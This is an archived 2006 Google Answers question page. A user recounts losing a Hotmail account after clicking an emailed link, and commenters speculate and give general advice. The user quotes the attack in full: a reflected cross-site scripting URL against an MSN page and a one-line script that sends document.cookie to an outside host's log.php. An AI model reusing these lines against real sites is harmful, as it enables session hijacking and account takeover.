| View Question |
|
|
 | ||
|
| Subject:
My hotmail password was stolen by a hacker. What was wrong? and What to do now?
Category: Computers > Security Asked by: kakarukeys-ga List Price: $100.00 |
Posted:
24 Aug 2006 00:34 PDT
Expires: 24 Aug 2006 06:13 PDT Question ID: 759004 |
I use newest Mozilla Firefox on a Windows XP which I think isn't patched to the fullest. I received a suspicious email when I checked my hotmail today. (My hotmail password might be saved inside the firefox, I'm not very sure) There was a link inside that email: http://www.jazzyjewellery.com/vb (PLEASE DO NOT CLICK UNLESS YOU ARE SURE WHAT YOU ARE DOING) Out of curiosity. I clicked on the link to see what it leads to I saw another link: www.jazzyjewellery.com/vb/nice.js I opend that file, inside the file I saw location.href='http://www.jazzyjewellery.com/vb/log.php?nice='+escape(document.c ookie) I then opened (thinking it should be harmless) http://www.jazzyjewellery.com/vb/log.php?I_typed_some_rubbish_here some dirty words came out, I then closed it. Moments later when I wanted to check my hotmail again, I couldn't sign in. I tried many passwords I used, all failed. A friend told me he saw my MSN message online, talking nonsense to him. But it wasn't me. My hotmail account was compromised. I would like to know how he did it? and What should I do now? | |
| |
|
| ||
|
| There is no answer at this time. |
| ||
|
| Subject:
Re: My hotmail password was stolen by a hacker. What was wrong? and What to do now?
From: probonopublico-ga on 24 Aug 2006 00:55 PDT |
As you have found the hard way, it is not a good idea to follow links provided by unknown senders. (I have resisted the temptation.) I don't know what to recommend but I am sure that there a GAR will soon come to your rescue. Good Luck! Bryan |
| Subject:
Re: My hotmail password was stolen by a hacker. What was wrong? and What to do n
From: kakarukeys-ga on 24 Aug 2006 01:01 PDT |
As I have found out in the hard way, FireFox is not what they claim to be .......... More info: (I used a linux to open) http://www.jazzyjewellery.com/vb goes to: http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=%20%22%3E%3Cscript %20src%3Dhttp%3A//www.jazzyjewellery.com/vb/nice.js%3E%3C/script%3E askes me to set a cookie: ASPSESSION=EBKLDNFCHLAJ after that: '); Unless your browser has scripting disabled, you should be returned to the page you were at in a couple seconds. Otherwise, please click ">here to return manually. inside the file www.jazzyjewellery.com/vb/nice.js lies one line: location.href='http://www.jazzyjewellery.com/vb/log.php?nice='+escape(document.c ookie) I couldn't download the php file |
| Subject:
Re: My hotmail password was stolen by a hacker. What was wrong? and What to do n
From: keystroke-ga on 24 Aug 2006 03:58 PDT |
I used IE7 on Windows Server Longhorn and I got the same, I don't beleive I have used MSN on that machine so it was a safe machine but it does follow the exact same path that was described kakarukeys. If you go to /vb/log.php you get "FACK U" and a picture of a little cartoon character. I know it does not help but it is quite interesting how MSN is used for this. Perhaps it is an interception script. I will forward this onto a security company I know of and see what they say. --Keystroke-ga |
| Subject:
Re: My hotmail password was stolen by a hacker. What was wrong? and What to do now?
From: frde-ga on 24 Aug 2006 05:50 PDT |
I have a strong hunch that I know what you have run into. It looks like an anti 419-er |
If you feel that you have found inappropriate content, please let us know by emailing us at answers-support@google.com with the question ID listed above. Thank you. |
| Search Google Answers for |
| Google Home - Answers FAQ - Terms of Service - Privacy Policy |